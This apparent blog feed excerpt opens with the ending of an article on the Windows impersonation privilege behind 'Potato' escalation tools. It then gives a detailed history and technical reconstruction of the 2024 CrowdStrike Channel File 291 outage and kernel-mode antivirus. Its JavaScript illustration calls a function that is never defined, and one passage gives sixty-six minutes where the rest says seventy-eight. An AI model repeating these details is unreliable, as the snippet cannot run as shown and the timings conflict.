Microsoft gave every NETWORK SERVICE a privilege that, in the wrong hands, is equivalent to SYSTEM. They knew -- the MSRC said as much in April 2009 [@msrc-blog-2009-04-token-kidnapping]. They could not change it without breaking the service model: every closure path carries a documented compatibility cost they have explicitly declined to accept [@msrc-windows-security-servicing-criteria]. Pierini and Cocomazzi made the doctrine quotable at Troopers 24 [@pierini-cocomazzi-troopers24-talk]: WSH is a safety boundary, not a security boundary. Roughly eighteen years after Cerrudo first put that fact on the record [@cerrudo-2008-pdf], ten years after HotPotato made it pushbutton [@breen-2016-hot-potato], and three years after GodPotato survived the most aggressive DCOM hardening Microsoft has shipped [@beichendream-godpotato-readme; @nvd-cve-2021-26414], the primitive is still in place. It is not unpatched. It is documented-as-policy not to be patched.

For the variant-by-variant chronology this article deliberately deferred -- HotPotato, RottenPotato, JuicyPotato, JuicyPotatoNG, PrintSpoofer, EfsPotato, CoercedPotato, RoguePotato, RemotePotato0, GodPotato, LocalPotato, SilverPotato, FakePotato -- see the sibling Potato Family article (2026-05-31). That article catalogues each named tool's CLSID, coercion primitive, and patch state. This one was about why the family exists at all.

The one line in whoami /priv is not a bug. It is the decision.

Seventy-Eight Minutes That Evicted Antivirus From the Windows Kernel

noreply@paragmali.com (Parag Mali) — Tue, 02 Jun 2026 00:00:00 GMT

At 04:09 UTC on July 19, 2024, a CrowdStrike Falcon channel-file update -- not a driver update, but a small data file consumed by an in-kernel interpreter -- crashed approximately 8.5 million Windows hosts in seventy-eight minutes. The technical bug was a parameter count mismatch the content validator missed; the architectural bug was that the dangerous code was already in the kernel. Microsoft's response, the Windows Resiliency Initiative, commits to a multi-year migration of third-party endpoint security out of kernel mode -- a Vista-era idea finally given political license to ship. Whether user-mode EDR with hypervisor-assisted introspection can match twenty-five years of kernel-mode hooking coverage is the article's open architectural question, and the honest mid-2026 answer is "we do not yet know."

1. 04:09 UTC, Friday, July 19, 2024

At 04:09 UTC on Friday, July 19, 2024, a CrowdStrike Falcon Cloud release pipeline pushed a Rapid Response Content file -- not a sensor binary, not a driver update, but a small piece of data named in the C-00000291-*.sys channel-file naming convention -- to the production rollout channel for Falcon Sensor on Windows [@cs-pir-2024-07-24]. The release engineer at the rollout console saw the indicator move from staging to production. Sixty-six minutes later, by Microsoft's own count, approximately 8.5 million Windows hosts had bug-checked and were either rebooting into a kernel panic or already stuck in one [@ms-bradsmith-2024-07-20]. Delta and United pulled gates. The U.K. National Health Service diverted patients away from impacted trusts. Public-safety answering points went degraded across several U.S. states [@crs-if12717-everycrsreport]. CrowdStrike's release pipeline reverted the bad content at 05:27 UTC -- seventy-eight minutes after it had been pushed -- and the rollout indicator on the CrowdStrike side went from red back to green [@cs-pir-2024-07-24]. The rollout indicator on every customer machine that had already received the bad content went, and stayed, blue. The dangerous code was already in the kernel; the update had only handed it a fatal input.

That single fact -- that a content update could brick eight and a half million machines without the code path that consumed the content ever being treated as a code path -- is the whole reason this article exists.

The numbers, anchored to primary sources

Brad Smith, Microsoft's vice chair and president, published his "8.5 million Windows devices" figure on July 20, 2024 -- the morning after the incident -- and the phrase is unchanged in any Microsoft document since: "we currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines" [@ms-bradsmith-2024-07-20]. The U.S. Government Accountability Office later framed the incident as "potentially one of the largest IT outages in history" [@gao-24-107733]. The U.S. Cybersecurity and Infrastructure Security Agency opened a running advisory the same day, anchored to its own July 19, 2024 alert, that has been updated continuously since [@cisa-alert-2024-07-19]. The Congressional Research Service's IF12717 brief lays out the public-safety blast radius -- FAA ground stops, 911 PSAP degradation, hospital systems falling back to paper -- and Adam Meyers, CrowdStrike's Senior Vice President for Counter Adversary Operations, was sworn in before the House Homeland Security Committee's Cybersecurity Subcommittee on September 24, 2024 to answer for it [@crs-if12717-everycrsreport, @homeland-hearing-page, @cyberscoop-meyers].

The fault, as Microsoft's dump shows it

Eight days after the outage, on July 27, 2024, Microsoft's security team published a primary-source post-mortem [@ms-secblog-2024-07-27]. The dump's load-bearing fields, condensed and relabeled below for readability (Microsoft's actual labels are READ_ADDRESS, IMAGE_NAME, FAULTING_MODULE, with the faulting instruction inside the .trap disassembly and KiPageFault inside the stack trace):

READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369

Read low to high, every line answers a different question. csagent.sys is the CrowdStrike Falcon kernel driver. csagent+e14ed is the offset of the faulting instruction inside that driver. mov r9d, dword ptr [r8] is that instruction -- a single x86-64 move that loads a 32-bit value from the memory address in register r8 into register r9d. The address in r8 was 0xffff840500000074, in the high half of the kernel virtual address space, which the labelling "Paged pool" suggests the memory manager classifies as paged kernel memory -- but at that specific virtual address, on this machine, at this instant, no page table entry mapped a physical page. The CPU raised a page fault. Windows delivered the fault to nt!KiPageFault+0x369. The kernel bug-checked with PAGE_FAULT_IN_NONPAGED_AREA [@ms-secblog-2024-07-27, @ms-bradsmith-2024-07-20].

There is one piece of information the WinDBG dump does not publish, and the article is going to be careful about it: the IRQL value at the moment of the fault. No primary source records whether csagent.sys was at PASSIVE_LEVEL, APC_LEVEL, DISPATCH_LEVEL, or higher when the page fault triggered. What every primary source agrees on is the consequence: the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way, and the operating system stopped. Treat any third-party post that asserts a specific IRQL value for Channel File 291 as speculation unless it cites a primary source that publishes the value.

sequenceDiagram participant Cloud as Falcon Cloud Rollout participant Sensor as Falcon Sensor (user mode) participant Driver as csagent.sys (kernel) participant Kernel as Windows Kernel participant Disk as Local Disk Cloud->>Sensor: 04:09 UTC push of Channel File 291 Sensor->>Disk: Persist channel file Sensor->>Driver: Load Template Instance into in-kernel interpreter Driver->>Driver: Index 21st parameter slot Driver->>Kernel: Dereference unmapped kernel address 0xffff840500000074 Kernel->>Kernel: nt!KiPageFault, then bug check 0x50 Note over Kernel: PAGE_FAULT_IN_NONPAGED_AREA, host blue screens Cloud->>Cloud: 05:27 UTC, revert bad content Note over Cloud,Disk: New hosts are saved, already-affected hosts are not Disk->>Driver: On reboot, csagent.sys re-reads the persisted file Driver->>Kernel: Same fault path executes again

The persistence-across-reboot pathology is the part most contemporary coverage understated. CrowdStrike reverted the bad content from the cloud rollout pipeline 78 minutes after pushing it [@cs-pir-2024-07-24]. But the file was already on disk on every machine that had received it. On reboot, csagent.sys loaded again, parsed the persisted file again, and bug-checked again. The fix required either a manual safe-mode deletion -- the canonical "boot, delete C-00000291*.sys, reboot" runbook that circulated on Reddit, social media, and vendor advisories that morning -- or, later, Microsoft's purpose-built recovery tool [@mslearn-qmr].

That is what happened. The next question -- the one this article exists to answer -- is why the dangerous code was already in the kernel in the first place, what twenty-five years of architectural decisions put it there, and what it took to begin to undo those decisions. To get there, we have to start in 1999.

2. Why Antivirus Lives in the Kernel

Imagine you are a security engineer in 1999. Your assignment is to detect a virus that has installed itself between the user-mode file APIs and the on-disk file system, so that when a scanner running as a user reads the file, the virus serves up a clean copy of the bytes and hides the infected ones. Where do you put the observer?

If you think about it for a minute, you converge on the same answer Microsoft, Symantec, Network Associates, Trend Micro, and every other antivirus vendor converged on in the late 1990s: you put the observer below the thing that is lying. In Windows terms, "below" means kernel mode. On x86, that is Ring 0. In NT terminology, that is the privilege level at which all the operating system primitives -- the file system, the process manager, the memory manager -- actually live.

A per-processor priority value Windows uses to gate code execution against hardware and software interrupts. Code running at PASSIVE_LEVEL (zero) can be preempted by almost anything; code running at DISPATCH_LEVEL or higher cannot take page faults on pageable memory and must complete quickly. Kernel drivers must obey strict IRQL rules; violations -- such as touching pageable memory at DISPATCH_LEVEL -- produce immediate bug checks rather than recoverable exceptions.

The 1999 to 2003 transition

The first generation of Windows antivirus, on Windows 9x and NT 4.0, ran almost entirely in user mode and lost the argument with the first rootkits to ship in the wild. A scanner that runs in the same protection ring as the malware it is hunting cannot, by construction, see what the malware has chosen to hide from anything in that ring. The fix, by the late 1990s and the early 2000s, was to push the scanner into Ring 0.

Two specific Windows kernel primitives carried that fix.

The first was the minifilter: a kernel driver attached to the I/O manager's file system stack at a specific altitude, intercepting IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, and friends, so the antivirus could examine the file before the file system returned the bytes to user mode [@mslearn-filter-drivers]. Microsoft formalized the Filter Manager as the supported way to do this -- and by the mid-2000s the legacy sfilter model was deprecated in favor of the structured minifilter model. Every shipping Windows antivirus in 2026 still has a minifilter driver loaded as part of its boot-time stack.

A kernel driver registered through the Windows Filter Manager that attaches to one or more file system volumes at a specific *altitude* (a Microsoft-assigned numeric priority) and receives pre-operation and post-operation callbacks for each file system operation. Antivirus minifilters use this hook point to scan a file before user-mode code sees the bytes returned from disk.

The second was the process-create kernel callback. Beginning with Windows 2000 and extended for synchronous block authority in Windows Vista SP1 (alongside Windows Server 2008), the documented function PsSetCreateProcessNotifyRoutine (and later PsSetCreateProcessNotifyRoutineEx) lets a kernel driver register to be called whenever the kernel is about to create a new process, with the option in the extended variant to set CreationStatus = STATUS_ACCESS_DENIED and synchronously block the create [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-pssetcreateprocessnotifyroutineex]. This is the kernel primitive that lets an EDR vendor say "process X is about to spawn cmd.exe with these arguments, and we are denying the create" without ever exiting the kernel. Companion callbacks exist for image-load events, thread-create events, registry operations [@mslearn-cmregistercallback], and handle-access events [@mslearn-obregistercallbacks]. Together they form the documented Generation-2 vendor API surface for EDR primitives, the architectural substrate every modern Windows EDR sits on top of.

The rootkit pressure

The second pressure that pushed antivirus down into the kernel came from the attackers themselves. By the mid-2000s, kernel-mode rootkits were a routine part of the malware writer's toolkit. The most pernicious variants used a technique called Direct Kernel Object Manipulation: instead of installing themselves anywhere a defender could observe via documented APIs, they walked Windows internal data structures and unlinked themselves from the lists the operating system traversed when answering questions like "what processes are running?" or "what kernel modules are loaded?"

A rootkit technique that modifies in-memory Windows kernel data structures directly -- for example, unlinking an `EPROCESS` block from the active process list so that `nt!PsActiveProcessHead` traversal does not enumerate the malicious process. Because the modification is invisible to any code that asks the kernel to enumerate via the documented APIs, the only defenders that can see DKOM are those that walk kernel memory authoritatively from a vantage equal to or below the rootkit itself.

To catch a Ring-0 rootkit, you needed a Ring-0 defender. Symantec, McAfee, Trend Micro, and Kaspersky all converged on the same answer in the early 2000s, and every commercial Windows EDR architecture in 2026 still reflects that convergence.The lineage from DOS-era signature scanners (one-process, no privilege boundary) through Win9x scanners (no privilege boundary either) through NT-era minifilters (a privilege boundary, with the scanner across the boundary from the malware) to 2024-era in-kernel content interpreters (a privilege boundary, with the scanner and a rule engine and an unsigned content channel all on the same side of the boundary) is a small case study in how an architecture persists long after the original constraints relax.

Architectural decisions made under one set of constraints have a way of outliving the constraints that produced them. The 1999 decision to put antivirus in the kernel was rational at the time -- it was the only place from which you could authoritatively see what a process or a file system actually did. Twenty-five years later, that decision produced csagent.sys running in Ring 0 on 8.5 million machines, indexing past the end of a parameter array on a Friday morning in July.

But the move into the kernel did not go uncontested. Microsoft itself spent two years between 2005 and 2007 trying to claw back at least part of that ground. The first attempt was called Kernel Patch Protection, and the political fight it produced is the story of the next section.

3. The Vista PatchGuard Battle, 2005-2007

Either everybody has access to the kernel, or nobody does. -- Stephen Toulouse, Microsoft senior product manager, InformationWeek, October 2006 [@informationweek-2006-toulouse]

The political question at the heart of this article is twenty years old. It is also binary in a way that very few political questions ever are: Microsoft's stated position in 2006 was not "we will permit some vendors to modify the kernel and deny others," nor "we will run an accreditation scheme," nor "we will charge for kernel-mode signing certificates." The stated position was that either every vendor on Earth could modify the Windows kernel or no vendor could, and the only stable answer was the second one. That argument, made by a Microsoft senior product manager in trade press in 2006, reverberates without modification into the November 2024 Windows Resiliency Initiative announcement.

What Kernel Patch Protection actually does

Kernel Patch Protection -- commonly called PatchGuard -- shipped with x64 editions of Windows XP, Windows Server 2003 Service Pack 1, and the launch x64 edition of Windows Vista, beginning in 2005 [@wiki-kpp]. Microsoft updated it in August 2007 via Security Advisory 932596, which is the canonical Microsoft primary document for the program [@ms-advisory-932596].

A Windows kernel feature on x64 builds that periodically verifies the integrity of selected critical kernel structures -- the System Service Descriptor Table (SSDT), the Interrupt Descriptor Table (IDT), the Global Descriptor Table (GDT), the kernel image, the Hardware Abstraction Layer (HAL), and the NDIS network stack. If PatchGuard detects modification it triggers bug check `0x109` `CRITICAL_STRUCTURE_CORRUPTION` and the operating system stops [@wiki-kpp].

What PatchGuard does is enforce an invariant: third-party code may not modify a specific list of kernel data structures, and if it does, the system bug-checks. What PatchGuard does not do is prevent third-party drivers from loading. PatchGuard is a structural integrity check, not a load-time policy. The Vista-era plan was for vendors to migrate from inline hooks of the SSDT to the documented callback APIs of the previous section -- PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks, CmRegisterCallback, the Filter Manager [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-obregistercallbacks, @mslearn-cmregistercallback, @mslearn-filter-drivers] -- and csagent.sys is the lineal descendant of that migration: a fully documented, fully callback-based, fully Generation-2 driver. PatchGuard did exactly what it was designed to do, and csagent.sys was perfectly compatible with it.

The political fight

Symantec and McAfee did not see it that way in 2005. To them, PatchGuard was Microsoft using a security feature to advantage its own emerging Microsoft Forefront Client Security antivirus product against the entire third-party industry. The complaint escalated to the European Commission in October 2006 [@wiki-kpp]. Stephen Toulouse, then a Microsoft senior product manager, replied in InformationWeek with the line that anchors this section: "Either everybody has access to the kernel, or nobody does. Malware writers exploit the same interfaces to access Windows kernel, a threat that Microsoft says outweighs the benefits. Modifying the kernel also compromises Windows performance, according to the company" [@informationweek-2006-toulouse]. Microsoft's binary-symmetry position was that any vetting scheme -- "trusted vendors get kernel access" -- would simply produce malware that pretended to be a trusted vendor. The only stable equilibria were "everyone" and "no one." Microsoft chose "no one for the things PatchGuard protects," and then opened a parallel migration path of documented callback APIs as the supported alternative.

The Symantec and McAfee complaints in 2006 were filed in the wake of Microsoft's own 2005 entry into the corporate antivirus market with what became Forefront Client Security. The trade press read it as the same competitive grievance Netscape filed against Microsoft a decade earlier: a platform owner introducing first-party products into a market the platform owner also regulated. Gartner's John Pescatore framed the worry, quoted in the same InformationWeek piece, as Microsoft becoming *"the layer between the user and the security products"* [@informationweek-2006-toulouse]. The European Commission opened an inquiry; Microsoft compromised by documenting the callback APIs and shipping the August 2007 update to KPP [@ms-advisory-932596]. The two AV vendors stayed in business; their kernel hooks moved from SSDT patches to `PsSetCreateProcessNotifyRoutine` calls. Twenty years later, the same two vendors -- both still selling Windows EDR products -- are now publicly endorsing Microsoft's move to take *all* third-party EDR out of the kernel. The political ground really has shifted; we will see by how much in section 6.

The lesson Microsoft drew, and the lesson it did not yet draw

The 2005 to 2007 round produced a real, durable architectural lesson: documented APIs are stabler than hooks. A vendor who wrote a driver that called PsSetCreateProcessNotifyRoutineEx could rely on Microsoft to preserve the API across Windows builds. A vendor who wrote a driver that patched the SSDT pointer table directly could rely on the next Windows service pack to break it without warning, or now on PatchGuard to bug-check the host. Every shipping Windows EDR in 2026 lives downstream of that lesson -- their kernel drivers use the documented callback APIs and they do not patch kernel structures inline.

But there was a second lesson Microsoft did not draw in 2005. The PatchGuard fight was about technique (do not patch the SSDT) and it stopped there. It did not pose the deeper question: should third-party kernel drivers exist at all for AV? That question -- whether vendor-authored Ring-0 code is a fleet-scale reliability liability regardless of whether it hooks or uses callbacks -- was visible in principle in 2005 and ignored. Microsoft would not pose it publicly for another nineteen years. What changed, in the meantime, was a slow drip of failures that should have made the question unavoidable and somehow did not. That drip is the subject of section 4.

4. Fourteen Years of Kernel-Driver Disasters

If the kernel-mode antivirus architecture was a 1999 design choice, you would expect it to have aged badly. It did. The pattern played out generation after generation, vendor after vendor, year after year, with the same general shape: a vendor pushed content; the vendor kernel driver consumed the content; the content had a bug the validator missed; the driver crashed the kernel; the fleet went down. The most consequential single instance of the pattern, before July 19, 2024, happened on April 21, 2010 with McAfee VirusScan and a daily virus definition update named DAT 5958.

McAfee DAT 5958, April 21, 2010

McAfee shipped its 5958 DAT file. The file misidentified svchost.exe -- the legitimate Windows service host -- as W32/Wecorl.a, a network worm. The McAfee kernel driver quarantined svchost.exe per the false positive. On Windows XP SP3 fleets at hospitals, police departments, schools, and government agencies across the U.S., the result was an immediate reboot loop and total loss of networking [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee].

US-CERT's contemporaneous advisory captured the failure mode in a single sentence: "US-CERT is aware of public reports indicating that McAfee DAT release 5958 is incorrectly identifying the valid system file, C:\Windows\system32\svchost.exe, as containing malicious code... Symptoms include a denial-of-service condition when the McAfee software attempts to clean the file" [@uscert-mcafee-2010]. SANS's Internet Storm Center noted the same morning that "DAT file version 5958 is causing widespread problems with Windows XP SP3. The affected systems will enter a reboot loop and lose all network access" [@sans-isc-8656]. Microsoft's own AskPerf team, in a TechCommunity post dated April 21, 2010, walked through the recovery steps and the EXTRA.DAT remediation [@askperf-mcafee].

Here is the structural point, and it matters enormously for the rest of this article: the McAfee driver was doing nothing PatchGuard would have prevented. It was a fully Generation-2 design, using documented kernel callback APIs, with no inline kernel patching whatsoever. The 2005 PatchGuard fight was politically irrelevant to the 2010 McAfee outage, because PatchGuard was answering a different question -- "does the vendor patch SSDT entries inline?" -- when the question that produced the McAfee outage was "does the vendor's signed, callback-using, fully-supported kernel driver act on data that turns out to be wrong?" The 2005 fix did not address the 2010 fault.

Key idea: McAfee 2010 and CrowdStrike 2024 are architecturally identical: a vendor pushed content; the vendor kernel driver consumed the content; the content was wrong in a way that the validator did not catch; the driver crashed the fleet. The 2005 PatchGuard fight had been about a different problem entirely. The architecture that produced both failures -- "vendor-authored Ring-0 code consuming cloud-pushed updates" -- was untouched by the 2005 fix and would not be touched again until 2024.

The mid-2010s tail

Between 2010 and 2024 the same pattern reappeared at smaller scale, episodically, across the vendor cohort. Symantec, Trend Micro, Kaspersky, and Sophos each shipped at least one driver or definition update during this period that produced blue-screen reports on customer fleets. The Three Buddy Problem podcast, recorded on July 19, 2024 in the immediate aftermath of the CrowdStrike outage, opens with Costin Raiu drawing the line back from 2024 to 2010 explicitly: the lesson the industry promised itself after McAfee 5958 was staged rollouts, and the lesson the industry actually implemented was insufficient [@three-buddy-ep5].Raiu's framing on the podcast -- "we had this exact discussion in 2010, and the answer everyone agreed on was staged rollouts, and here we are again" -- is the cleanest single-sentence retrospective from inside the industry. The same week, Patrick Wardle was making the same point with macOS-side framing on his Objective-See blog [@wardle-objsee-0x7b] and at the August 2024 Black Hat USA talk whose slides he later published [@wardle-speakerdeck].

The Apple natural experiment, September 2024

Two months after CrowdStrike Channel File 291, Apple shipped macOS 15 Sequoia on September 16, 2024 with deprecated Application Firewall property-list interfaces [@bleepingcomputer-sequoia]. CrowdStrike Falcon for macOS, ESET Endpoint Security, Microsoft Defender for Mac, and SentinelOne all broke their network filtering [@securityweek-sequoia, @bleepingcomputer-sequoia]. Apple shipped macOS 15.0.1 on October 3, 2024, seventeen days later, restoring compatibility [@techcrunch-sequoia]. The TechCrunch report has Patrick Wardle on the record, framing the architectural difference in one line: "a fix for the networking issues that plagued the initial macOS 15 release... And to any Apple apologist who blamed 3rd-party vendors, you deserve to be slapped with a large trout as this was an Apple bug reported before GM" [@techcrunch-sequoia].

That second sentence is the load-bearing one. The Sequoia bug was a 1st-party regression in the framework boundary between macOS and third-party endpoint security tools. It degraded EDR features substantially -- network filtering disappeared on every affected host -- but no host kernel-panicked. None of the affected EDR vendor processes brought down macOS. None of the affected hosts entered a reboot loop. The same general failure mode as Channel File 291 produced a fundamentally different blast radius, and the only reason for the difference is architectural: Apple had moved third-party endpoint security out of macOS kernel mode in 2019 with the Endpoint Security framework [@apple-esf-docs]. We will return to ESF in section 7.

The macOS 15 Sequoia outage and the Windows Channel File 291 outage occurred within ten weeks of each other and shared the same general structure: a 1st-party platform event meeting a third-party security product loaded for runtime introspection. The Windows event panicked the kernel on 8.5 million hosts. The macOS event produced a feature regression that vendors patched out within three weeks and Apple repaired in 15.0.1. The two events are the article's strongest single comparative datum that architecture, not vendor reliability, was the variable. timeline title Recurring kernel-driver and platform faults, 2005 to 2024 2005 : PatchGuard ships on Windows x64 : Symantec and McAfee escalate antitrust complaints 2010 : McAfee DAT 5958 quarantines svchost.exe on Windows XP SP3 : Fleet-scale reboot loops at hospitals, police, schools 2014 : Various smaller vendor BSOD events in the long tail 2019 : Apple ships macOS Catalina Endpoint Security framework : Third-party AV deprecated from kernel mode on macOS 2024 : CrowdStrike Channel File 291 on July 19, 8.5M hosts : Apple ships macOS 15 Sequoia on September 16 : macOS 15.0.1 restores AV compatibility on October 3 2024 : Microsoft Ignite announces Windows Resiliency Initiative on November 19

CrowdStrike Channel File 291, July 19, 2024

By July 2024 the cumulative evidence had been building for fourteen years that vendor-authored Ring-0 code was a fleet-scale reliability liability. What was different about Channel File 291 was not the kind of failure but the scale and the cost: 8.5 million hosts on Windows in 2024 versus what was likely a six-or-seven-figure XP SP3 fleet on McAfee in 2010, and a cost calculus that included Delta Air Lines, the U.K. NHS, multiple state 911 systems, and the global air-traffic-control flow that depends on Microsoft Windows running healthy [@cs-pir-2024-07-24, @gao-24-107733, @crs-if12717-everycrsreport]. The political license to do something architectural had finally arrived. What it took, in real-world failures, to surface the architectural answer was not new evidence -- the evidence had been overwhelming for years -- but a single event large enough to make the political cost of not changing untenable.

So: what exactly happened inside csagent.sys on the morning of July 19, 2024? That technical reconstruction is the centerpiece of this article, and it occupies the next section.

5. Inside Channel File 291

The technical centerpiece. Start by staring at the same five-field summary, reformatted from Microsoft's July 27, 2024 crash-dump walkthrough [@ms-secblog-2024-07-27]:

READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369

Reading from low to high address, every line of that summary answers a different question. The complete line-by-line walkthrough is folded into the spoiler later in this section. First we have to understand what csagent.sys was trying to do when it ran the instruction.

The Windows bug check raised when kernel code attempts to read from or write to a virtual address that has no valid mapping in the page tables. The "nonpaged area" naming is historical -- the bug check fires whenever any kernel-mode access touches an unmapped virtual address, regardless of which memory pool the address would have lived in if it had been valid.

What `csagent.sys` was trying to do

csagent.sys is the CrowdStrike Falcon Sensor kernel driver, the Ring-0 component that has been part of the Falcon product since its earliest Windows releases. By 2024, this driver did considerably more than mediate file I/O and process creation. According to CrowdStrike's own Root Cause Analysis published on August 6, 2024, csagent.sys includes a Content Interpreter that runs at kernel privilege and consumes binary detection rules shipped from the Falcon Cloud [@cs-rca-2024-08-06]. CrowdStrike's terminology distinguishes two kinds of content delivery: Sensor Content, which is bundled with each released sensor binary and updates at the sensor release cadence; and Rapid Response Content, which is delivered via channel files like Channel File 291 and updates at a much faster cadence to keep ahead of novel adversary behavior [@cs-pir-2024-07-24]. Channel files are treated as data, not code -- but they are consumed by the Content Interpreter, which is code, running in the kernel.The Sensor Content versus Rapid Response Content distinction is the architectural detail that determines why a content update could reach the kernel at all. Sensor Content is signed and version-bumped together with the driver binary; Rapid Response Content is pushed independently and rapidly. The Falcon architecture used the Rapid Response Content channel to deliver Template Instances against a Template Type schema that the in-kernel Content Interpreter parsed. The channel-file delivery path bypassed the WHQL driver-signing scrutiny that the driver binary itself had received [@cs-pir-2024-07-24].

The CrowdStrike Falcon Sensor subsystem, resident inside `csagent.sys` at kernel privilege, that parses Rapid Response Content channel files at runtime. The interpreter reads a Template Instance (a binary payload of detection rules) and evaluates it against the corresponding Template Type schema declared in the sensor's compiled code. Detection rules thus take effect on a host whenever a new channel file is pushed from the Falcon Cloud, with no sensor binary update required.

The bug, exactly

CrowdStrike's RCA names the failure mode in plain language [@cs-rca-2024-08-06]. The IPC Template Type was introduced in Falcon sensor version 7.11, released on February 28, 2024. The IPC Template Type declares 21 input parameter fields. The sensor's integration code that fed the in-kernel Content Interpreter for this Template Type supplied only 20 input values -- one fewer than the schema declared. The Content Validator that was responsible for verifying each shipped Template Instance against its Template Type schema did not catch the count mismatch. From February 28 to July 19, all Template Instances against this Template Type happened to use a wildcard matcher on the 21st field, and the unmapped field went unread; the bug was latent for almost five months. On July 19, 2024, the deployed Template Instance for the first time used a non-wildcard matcher on the 21st field. At runtime on every Windows host with the affected Falcon sensor configuration, csagent.sys's Content Interpreter indexed into the 21st parameter slot and dereferenced past the end of the input array [@cs-rca-2024-08-06].

The faulting instruction was the mov r9d, dword ptr [r8] that Microsoft's July 27 post reproduces. The pointer in r8 was the unmapped kernel address 0xffff840500000074. The CPU page-faulted. The fault was delivered to nt!KiPageFault+0x369. The kernel bug-checked with PAGE_FAULT_IN_NONPAGED_AREA [@ms-secblog-2024-07-27].

- `READ_ADDRESS: ffff840500000074 Paged pool`. The virtual address the faulting instruction tried to read. The `ffff8405...` prefix is the high half of the x86-64 canonical address space -- on Windows, conventionally kernel virtual memory. The "Paged pool" label is the memory manager's classification of where the address would have lived if it had been mapped. At this instant, it was not. - `IMAGE_NAME: csagent.sys`. The kernel module containing the faulting instruction. This is the CrowdStrike driver. - `FAULTING_IP: csagent+e14ed`. The offset of the instruction inside `csagent.sys`. `e14ed` is the relative virtual address of the function reading the parameter slot. - `mov r9d, dword ptr [r8]`. The instruction itself: load a 32-bit value (`dword`) from the address in `r8` into the lower 32 bits of `r9`. This is one of the cheapest x86-64 memory loads possible; the bug is not in the instruction but in the value of `r8`. - `CALLED_FROM: nt!KiPageFault+0x369`. The point of return into the kernel's fault handler. `KiPageFault` is the standard #PF interrupt handler in `ntoskrnl.exe`. When the page fault could not be satisfied (no mapping for the requested address), `KiPageFault` raised the bug check that stopped the system.

About the IRQL -- the part of the post-mortem this article is most careful with. As §1 established, no public CrowdStrike RCA or Microsoft secblog post publishes the IRQL value at the moment of the fault [@ms-secblog-2024-07-27, @cs-rca-2024-08-06]. The article will not assert DISPATCH_LEVEL or any other specific value, because no primary source establishes one. Treat any third-party reconstruction that names the IRQL as speculation unless it cites a primary source.

sequenceDiagram participant Cloud as Falcon Cloud participant Sensor as Falcon Sensor (user mode) participant CI as Content Interpreter (csagent.sys) participant TT as Template Type schema, in driver participant TI as Template Instance, from channel file participant Kernel as Windows Kernel Cloud->>Sensor: Push Channel File 291 (Rapid Response Content) Sensor->>CI: Hand Template Instance to in-kernel interpreter CI->>TT: Read schema declaring 21 input parameter fields CI->>TI: Bind Template Instance values to schema fields Note over CI,TI: Integration code supplied 20 values, schema expected 21 Note over CI,TI: Content Validator did not catch the count mismatch CI->>TI: Index into 21st field for non-wildcard match CI->>Kernel: Read at unmapped kernel address 0xffff840500000074 Kernel->>Kernel: nt!KiPageFault, bug check 0x50 raised Note over Kernel: Operating system stops, host blue screens

Why a content update can crash a kernel driver

This paragraph is doing the load-bearing work of the entire article, and it deserves to be read slowly. The Falcon driver's code received WHQL signing scrutiny when CrowdStrike submitted each release of csagent.sys to Microsoft. The driver's content updates -- the channel files like Channel File 291 -- did not. The driver was architected so that data updates could drive new detection behavior without a driver release. Therefore the data file became the trust boundary. When the data file was malformed in a way the Content Validator missed, the entire WHQL signing scrutiny of the driver was effectively bypassed -- because the bug was triggered by a fully-signed driver consuming an unsigned data input that no one had validated against the driver's actual runtime expectations.

Note: The architectural lesson of Channel File 291 is not "kernel drivers are unsafe." It is that in modern EDR architectures, the cadence of content updates vastly outruns the cadence of code review, and when the content is interpreted in kernel context, the content becomes a kernel input. The trust boundary moved from the signed driver to the unsigned data file, and the industry had not named that movement before July 19, 2024. Microsoft Virus Initiative 3.0, which we will meet in section 6, names it explicitly and requires partners to engineer for it.

To make the abstract count-mismatch tangible for the reader who has never written a parser, here is the bug in a stripped JavaScript model. The JavaScript model does what every memory-safe runtime does -- it throws cleanly when you index past the end of an array -- but the comment in the unsafe branch describes the C / kernel reality: the read just returns whatever bytes happen to live at the out-of-bounds address, which on Windows kernel memory means an unmapped page and a PAGE_FAULT_IN_NONPAGED_AREA bug check.

{` // Model of the in-kernel Content Interpreter from CrowdStrike's RCA. // Template Type schema declares 21 fields; integration code supplied 20. // On July 19, 2024, the deployed Template Instance for the first time // used a non-wildcard matcher on the 21st field.

const schema = { fieldCount: 21 }; const instance = { values: Array.from({length: 20}, (_, i) => 'v' + i) };

// Memory-safe runtime catches the mismatch: try { runInterpreter(schema, instance, true); } catch (e) { console.log('SAFE:', e.message); }

// Unsafe model showing what the in-kernel C interpreter would do: runInterpreter(schema, instance, false); `}

The runnable model is doing one job: making the abstract "20 of 21" fault mode visible. In a memory-safe runtime, the validator (the runtime itself) catches the mismatch and throws. In a C kernel driver with no runtime validator, the load just happens, and whatever is at the out-of-bounds address is read. On csagent.sys on every affected Windows host on July 19, 2024, what was at the out-of-bounds address was an unmapped page, and the read fired PAGE_FAULT_IN_NONPAGED_AREA.

The persistence problem

CrowdStrike reverted the bad content cloud-side at 05:27 UTC, seventy-eight minutes after pushing it [@cs-pir-2024-07-24]. The revert achieved exactly the thing it was designed to achieve: no host that had not yet received the bad content would receive it. The revert achieved nothing for any host that had already received the bad content. The channel file was on disk. On reboot, the Falcon sensor reloaded it. The in-kernel Content Interpreter parsed it again. The host bug-checked again. The fix required either manual safe-mode deletion of C-00000291*.sys -- which became the canonical morning-of runbook circulated on every Windows admin forum -- or, later, Microsoft's purpose-built recovery tool [@mslearn-qmr, @insider-build-26120-4230]. The persistence-across-reboot pathology motivated the platform-level recovery primitive Microsoft would later ship as Quick Machine Recovery, which we will meet in section 6.

The bug is mundane. The kernel context is what made it catastrophic. Twenty-five years of architectural decisions placed a vendor-authored interpreter inside the kernel, plugged it into a cloud-driven content delivery pipeline, and shipped that combination to 8.5 million machines. On the morning of July 19, 2024, those decisions composed.

